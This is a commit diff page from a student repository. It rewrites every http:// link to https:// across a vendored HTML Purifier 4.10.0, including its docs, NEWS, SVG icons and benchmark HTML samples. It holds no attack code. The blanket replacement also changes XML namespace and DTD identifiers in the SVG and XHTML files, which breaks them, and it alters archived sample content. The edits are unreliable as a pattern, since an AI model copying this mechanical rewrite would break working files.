aschwarz/proseminar
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Server geändert

Browse Source
This commit is contained in:
aschwarz
2023-04-25 13:12:50 +02:00
parent 5e9c9cf19d
commit 57b74ca3a5
647 changed files with 3051 additions and 3051 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
htmlpurifier-4.10.0/Doxyfile
View File

@@ -17,7 +17,7 @@
# This tag specifies the encoding used for all characters in the config file that
# follow. The default is UTF-8 which is also the encoding used for all text before
# the first occurrence of this tag. Doxygen uses libiconv (or the iconv built into
# libc) for the transcoding. See http://www.gnu.org/software/libiconv for the list of
# libc) for the transcoding. See https://www.gnu.org/software/libiconv for the list of
# possible encodings.
DOXYFILE_ENCODING = UTF-8
@@ -493,7 +493,7 @@ INPUT = ". "
# This tag can be used to specify the character encoding of the source files that
# doxygen parses. Internally doxygen uses the UTF-8 encoding, which is also the default
# input encoding. Doxygen uses libiconv (or the iconv built into libc) for the transcoding.
# See http://www.gnu.org/software/libiconv for the list of possible encodings.
# See https://www.gnu.org/software/libiconv for the list of possible encodings.
INPUT_ENCODING = UTF-8
@@ -646,7 +646,7 @@ REFERENCES_LINK_SOURCE = YES
# If the USE_HTAGS tag is set to YES then the references to source code
# will point to the HTML generated by the htags(1) tool instead of doxygen
# built-in source browser. The htags tool is part of GNU's global source
# tagging system (see http://www.gnu.org/software/global/global.html). You
# tagging system (see https://www.gnu.org/software/global/global.html). You
# will need version 4.8.6 or higher.
USE_HTAGS = NO
@@ -1149,7 +1149,7 @@ PERL_PATH = /usr/bin/perl
CLASS_DIAGRAMS = YES
# You can define message sequence charts within doxygen comments using the \msc
# command. Doxygen will then run the mscgen tool (see http://www.mcternan.me.uk/mscgen/) to
# command. Doxygen will then run the mscgen tool (see https://www.mcternan.me.uk/mscgen/) to
# produce the chart and insert it in the documentation. The MSCGEN_PATH tag allows you to
# specify the directory where the mscgen tool resides. If left empty the tool is assumed to
# be found in the default search path.

12
htmlpurifier-4.10.0/INSTALL
View File

@@ -59,7 +59,7 @@ codebase. If you don't know what doctype you are using, you can determine
the doctype from this identifier at the top of your source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...and the character encoding from this code:
@@ -67,7 +67,7 @@ the doctype from this identifier at the top of your source code:
If the character encoding declaration is missing, STOP NOW, and
read 'docs/enduser-utf8.html' (web accessible at
http://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is
https://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is
present, read this document anyway, as many websites specify their
document's character encoding incorrectly.
@@ -234,7 +234,7 @@ However, switching to UTF-8 is not always immediately feasible, so we can
adapt.
HTML Purifier uses iconv to support other character encodings, as such,
any encoding that iconv supports <http://www.gnu.org/software/libiconv/>
any encoding that iconv supports <https://www.gnu.org/software/libiconv/>
HTML Purifier supports with this code:
$config->set('Core.Encoding', /* put your encoding here */);
@@ -271,10 +271,10 @@ Other supported doctypes include:
4.3. Other settings
There are more configuration directives which can be read about
here: <http://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring,
here: <https://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring,
but they can help out for those of you who like to exert maximum control over
your code. Some of the more interesting ones are configurable at the
demo <http://htmlpurifier.org/demo.php> and are well worth looking into
demo <https://htmlpurifier.org/demo.php> and are well worth looking into
for your own system.
For example, you can fine tune allowed elements and attributes, convert
@@ -288,7 +288,7 @@ translates to:
E.g.
$config->set('HTML.Allowed', 'p,b,a[href],i');
$config->set('URI.Base', 'http://www.example.com');
$config->set('URI.Base', 'https://www.example.com');
$config->set('URI.MakeAbsolute', true);
$config->set('AutoFormat.AutoParagraph', true);

10
htmlpurifier-4.10.0/NEWS
View File

@@ -213,7 +213,7 @@ real release we decided to skip this version number.
4.3.0, released 2011-03-27
# Fixed broken caching of customized raw definitions, but requires an
API change. The old API still works but will emit a warning,
see http://htmlpurifier.org/docs/enduser-customize.html#optimized
see https://htmlpurifier.org/docs/enduser-customize.html#optimized
for how to upgrade your code.
# Protect against Internet Explorer innerHTML behavior by specially
treating attributes with backticks but no angled brackets, quotes or
@@ -347,7 +347,7 @@ real release we decided to skip this version number.
- Fix bug where URIDefinition would not get cleared if it's directives got
changed.
- Fix fatal error in HTMLPurifier_Encoder on certain platforms (probably NetBSD 5.0)
- Fix bug in Linkify autoformatter involving <a><span>http://foo</span></a>
- Fix bug in Linkify autoformatter involving <a><span>https://foo</span></a>
- Make %URI.Munge not apply to links that have the same host as your host.
- Prevent stray </body> tag from truncating output, if a second </body>
is present.
@@ -681,7 +681,7 @@ real release we decided to skip this version number.
! DefinitionCacheFactory now can register new implementations
! New HTMLPurifier_Filter_ExtractStyleBlocks for extracting <style> from
documents and cleaning their contents up. Requires the CSSTidy library
<http://csstidy.sourceforge.net/>. You can access the blocks with the
<https://csstidy.sourceforge.net/>. You can access the blocks with the
'StyleBlocks' Context variable ($purifier->context->get('StyleBlocks')).
The output CSS can also be "scoped" for a specific element, use:
%Filter.ExtractStyleBlocksScope
@@ -1041,7 +1041,7 @@ real release we decided to skip this version number.
- Replaced version check with functionality check for DOM (thanks Stephen
Khoo)
. Added smoketest 'all.php', which loads all other smoketests via frames
. Implemented AttrDef_CSSURI for url(http://google.com) style declarations
. Implemented AttrDef_CSSURI for url(https://google.com) style declarations
. Added convenient single test selector form on test runner
1.3.2, released 2006-12-25
@@ -1103,7 +1103,7 @@ real release we decided to skip this version number.
+ %Attr.IDPrefixLocal - Same as above, but for when there are multiple
instances of user content on the page
+ Profuse documentation on how to use these available in docs/enduser-id.txt
! Added MODx plugin <http://modxcms.com/forums/index.php/topic,6604.0.html>
! Added MODx plugin <https://modxcms.com/forums/index.php/topic,6604.0.html>
! Added percent encoding normalization
! XSS attacks smoketest given facelift
! Configuration documentation now has table of contents

4
htmlpurifier-4.10.0/README.md
View File

@@ -1,4 +1,4 @@
HTML Purifier [![Build Status](https://secure.travis-ci.org/ezyang/htmlpurifier.svg?branch=master)](http://travis-ci.org/ezyang/htmlpurifier)
HTML Purifier [![Build Status](https://secure.travis-ci.org/ezyang/htmlpurifier.svg?branch=master)](https://travis-ci.org/ezyang/htmlpurifier)
=============
HTML Purifier is an HTML filtering solution that uses a unique combination
@@ -18,7 +18,7 @@ Places to go:
an in-depth installation guide.
* See WYSIWYG for information on editors like TinyMCE and FCKeditor
HTML Purifier can be found on the web at: [http://htmlpurifier.org/](http://htmlpurifier.org/)
HTML Purifier can be found on the web at: [https://htmlpurifier.org/](https://htmlpurifier.org/)
## Installation

6
htmlpurifier-4.10.0/TODO
View File

@@ -13,7 +13,7 @@ afraid to cast your vote for the next feature to be implemented!
Things to do as soon as possible:
- http://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307
- https://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307
- Think about allowing explicit order of operations hooks for transforms
- Fix "<.<" bug (trailing < is removed if not EOD)
- Build in better internal state dumps and debugging tools for remote
@@ -27,7 +27,7 @@ Things to do as soon as possible:
problem is what to do when a module "supersedes" another
(see also tables and basic tables.) This is a little dicier
because HTML.SafeObject has some extra functionality that
trusted might find useful. See http://htmlpurifier.org/phorum/read.php?3,5762,6100
trusted might find useful. See https://htmlpurifier.org/phorum/read.php?3,5762,6100
FUTURE VERSIONS
---------------
@@ -88,7 +88,7 @@ Ongoing
AutoFormat
- Smileys
- Syntax highlighting (with GeSHi) with <pre> and possibly <?php
- Look at http://drupal.org/project/Modules/category/63 for ideas
- Look at https://drupal.org/project/Modules/category/63 for ideas
Neat feature related
! Support exporting configuration, so users can easily tweak settings

18
htmlpurifier-4.10.0/art/icon-16x16.svg
View File

@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="16.000000px"
height="16.000000px"
id="svg2"
@@ -80,7 +80,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 4.7 KiB

After

Width:  |  Height:  |  Size: 4.7 KiB

18
htmlpurifier-4.10.0/art/icon-32x32.svg
View File

@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="16.000000px"
height="16.000000px"
id="svg2"
@@ -80,7 +80,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 4.7 KiB

After

Width:  |  Height:  |  Size: 4.7 KiB

20
htmlpurifier-4.10.0/art/logo.svg
View File

@@ -1,14 +1,14 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:xlink="https://www.w3.org/1999/xlink"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="82.000000mm"
height="82.000000mm"
id="svg2"
@@ -98,7 +98,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 5.3 KiB

After

Width:  |  Height:  |  Size: 5.3 KiB

12
htmlpurifier-4.10.0/benchmarks/samples/Lexer/1.html
View File

@@ -1,4 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Main Page - Huaxia Taiji Club</title>
@@ -13,9 +13,9 @@
<div id="heading"><a href="/en/Main_Page" title="English Main Page">Huaxia Taiji Club</a>
<a class="heading_ch" href="/ch/Main_Page" title="&#20013;&#25991;&#20027;&#39029;">&#21326;&#22799;&#22826;&#26497;&#20465;&#20048;&#37096;</a></div>
<ul id="menu">
<li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="http://www.taijiclub.org/gallery2/main.php">Gallery</a></li>
<li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="https://www.taijiclub.org/gallery2/main.php">Gallery</a></li>
<li><a href="http://www.taijiclub.org/forums/index.php">Forums</a></li>
<li><a href="https://www.taijiclub.org/forums/index.php">Forums</a></li>
</ul>
<div id="content">
@@ -26,10 +26,10 @@
<ul>
<li>Zou Xiaojun was elected as the new club vice president </li>
<li>HX Edison Taiji Club <a href="http://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li>
<li>HX Edison Taiji Club <a href="https://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li>
<li>A new email account for our club: HXEdisontaijiclub@yahoo.com</li>
<li>Workshop conducted by <a href="http://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="http://www.taijiclub.org/en/Registration">Registration</a></li>
<li>Workshop conducted by <a href="https://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="https://www.taijiclub.org/en/Registration">Registration</a></li>
</ul>
</div>
@@ -46,7 +46,7 @@
<p>Check out our <a href="/gallery2/main.php">gallery</a>.</p>
<div style="text-align:center;"><a href="http://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div>
<div style="text-align:center;"><a href="https://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div>
<div style="text-align:center;">Click on photo to see HR version</div></div>
</body>

4
htmlpurifier-4.10.0/benchmarks/samples/Lexer/2.html
View File

@@ -10,11 +10,11 @@ function sf(){document.f.q.focus();}
function rwt(el,ct,cd,sg){var e = window.encodeURIComponent ? encodeURIComponent : escape;el.href="/url?sa=t&ct="+e(ct)+"&cd="+e(cd)+"&url="+e(el.href).replace(/\+/g,"%2B")+"&ei=fHNBRJDEG4HSaLONmIoP"+sg;el.onmousedown="";return true;}
// -->
</script>
</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b>&nbsp;|&nbsp;<a href="/url?sa=p&pref=ig&pval=2&q=http://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a>&nbsp;|&nbsp;<a href="/searchhistory/?hl=en">Search History</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/ManageAccount">My Account</a>&nbsp;|&nbsp;<a href="http://www.google.com/accounts/Logout?continue=http://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br>
</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b>&nbsp;|&nbsp;<a href="/url?sa=p&pref=ig&pval=2&q=https://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a>&nbsp;|&nbsp;<a href="/searchhistory/?hl=en">Search History</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/ManageAccount">My Account</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/Logout?continue=https://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br>
<form action=/search name=f><script><!--
function qs(el) {if (window.RegExp && window.encodeURIComponent) {var ue=el.href;var qe=encodeURIComponent(document.f.q.value);if(ue.indexOf("q=")!=-1){el.href=ue.replace(new RegExp("q=[^&$]*"),"q="+qe);}else{el.href=ue+"&q="+qe;}}return 1;}
// -->
</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b>&nbsp;&nbsp;&nbsp;&nbsp;<a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=2a class=q href="http://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=4a class=q href="http://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=5a class=q href="http://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a>&nbsp;&nbsp;&nbsp;&nbsp;<b><a href="/intl/en/options/" class=q>more&nbsp;&raquo;</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%>&nbsp;</td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2>&nbsp;&nbsp;<a href=/advanced_search?hl=en>Advanced Search</a><br>&nbsp;&nbsp;<a href=/preferences?hl=en>Preferences</a><br>&nbsp;&nbsp;<a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising&nbsp;Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>&copy;2006 Google</font></p></center></body></html>
</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b>&nbsp;&nbsp;&nbsp;&nbsp;<a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=2a class=q href="https://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=4a class=q href="https://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=5a class=q href="https://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a>&nbsp;&nbsp;&nbsp;&nbsp;<b><a href="/intl/en/options/" class=q>more&nbsp;&raquo;</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%>&nbsp;</td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2>&nbsp;&nbsp;<a href=/advanced_search?hl=en>Advanced Search</a><br>&nbsp;&nbsp;<a href=/preferences?hl=en>Preferences</a><br>&nbsp;&nbsp;<a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising&nbsp;Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>&copy;2006 Google</font></p></center></body></html>
<!-- vim: et sw=4 sts=4
-->

26
htmlpurifier-4.10.0/benchmarks/samples/Lexer/3.html
View File

@@ -7,7 +7,7 @@
<div id="tb">
<form name="lycos_search" method="get" target="_new" style="margin: 0px"
action="http://r.hotbot.com/r/memberpgs_lycos_searchbox_af/http://www.angelfire.lycos.com/cgi-bin/search/pursuit">
action="https://r.hotbot.com/r/memberpgs_lycos_searchbox_af/https://www.angelfire.lycos.com/cgi-bin/search/pursuit">
<table id="tbtable" cellpadding="0" cellspacing="0" border="0" width="100%" style="border: 1px solid black;">
<tr style="background-color: #dcf7ff">
@@ -20,34 +20,34 @@
<td nowrap="nowrap">The Web</td>
<td><input type="radio" name="cat" value="angelfire"></td>
<td nowrap="nowrap">Angelfire</td>
<td nowrap="nowrap">&nbsp;&nbsp;&nbsp;<img src="http://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap">&nbsp;<a href="http://r.lycos.com/r/tlbr_planet/http://planet.lycos.com" target="_new">Planet</a></td>
<td nowrap="nowrap">&nbsp;&nbsp;&nbsp;<img src="https://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap">&nbsp;<a href="https://r.lycos.com/r/tlbr_planet/https://planet.lycos.com" target="_new">Planet</a></td>
</tr>
</table>
<td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top">
<td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top">
<span id="build">Edit your Site</span></a>&nbsp;</td>
<td><img src="http://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td>
<td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a>&nbsp;</td>
<td><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td>
<td><img src="https://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td>
<td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a>&nbsp;</td>
<td><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td>
</tr>
<tr style="background-color: #dcf7ff">
<td nowrap="nowrap" valign="middle">&nbsp;<input size="30" style="font-size: 10px; background-color: #fff;" type="text" name="query" id="searchbox"></td>
<td style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center">
<a href="http://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="http://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td>
<td style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center">
<a href="https://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="https://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td>
<span style="font-size: 11px;">
<span style="color:#00f; font-weight:bold;">&#171;</span>
<span id="top100">
<a href="javascript:void top100('prev')" target="_top">Previous</a> |
<a href="http://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> |
<a href="https://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> |
<a href="javascript:void top100('next')" target="_top">Next</a>
</span>
<span style="color: #00f; font-weight: bold;">&#187;</span>
</span>
</td>
<td valign="top" style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td>
<td valign="top" style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td>
</tr>
</table>
</form>
@@ -60,7 +60,7 @@ if (objAdMgr.isSlotAvailable("leaderboard")) {
}
</script>
<noscript>
<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a>
<a href="https://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="https://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a>
</noscript>
</td></tr>
@@ -112,10 +112,10 @@ if (objAdMgr.isSlotAvailable("leaderboard")) {
<tr><td><font face="verdana,geneva" color="#000011" size="1">What is better, subtitled or dubbed anime?</font></td></tr>
<tr><td><input type="radio" name="rd" value="1"><font face="verdana" size="2" color="#000011">Subtitled</font></td></tr>
<tr><td align="middle"><font face="verdana" size="1"><a href="http://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr>
<tr><td align="middle"><font face="verdana" size="1"><a href="https://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr>
</table></td></tr>
<tr>
<td><font face="verdana" size="1"><a href="http://www.alxnet.com/services/poll/">Free
<td><font face="verdana" size="1"><a href="https://www.alxnet.com/services/poll/">Free
Web Polls</a></font></td>
</tr>
</table></form>

122
htmlpurifier-4.10.0/benchmarks/samples/Lexer/4.html
View File

@@ -1,10 +1,10 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Tai Chi Chuan,Yang Pan-hou,Yang Chien-hou,Yang style Tai Chi Chuan,Yang Lu-ch'an,Wu/Hao style T'ai Chi Ch'uan,Wu Ch'uan-y<>,Hao Wei-chen,Yang Shou-chung,Wu style T'ai Chi Ch'uan,Wu Chien-ch'<27>an" />
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<link rel="copyright" href="https://www.gnu.org/copyleft/fdl.html" />
<title>Tai Chi Chuan - Wikipedia, the free encyclopedia</title>
<style type="text/css" media="screen,projection">/*<![CDATA[*/ @import "/skins-1.5/monobook/main.css?9"; /*]]>*/</style>
<link rel="stylesheet" type="text/css" media="print" href="/skins-1.5/common/commonPrint.css" />
@@ -34,7 +34,7 @@
<div id="content">
<a name="top" id="top"></a>
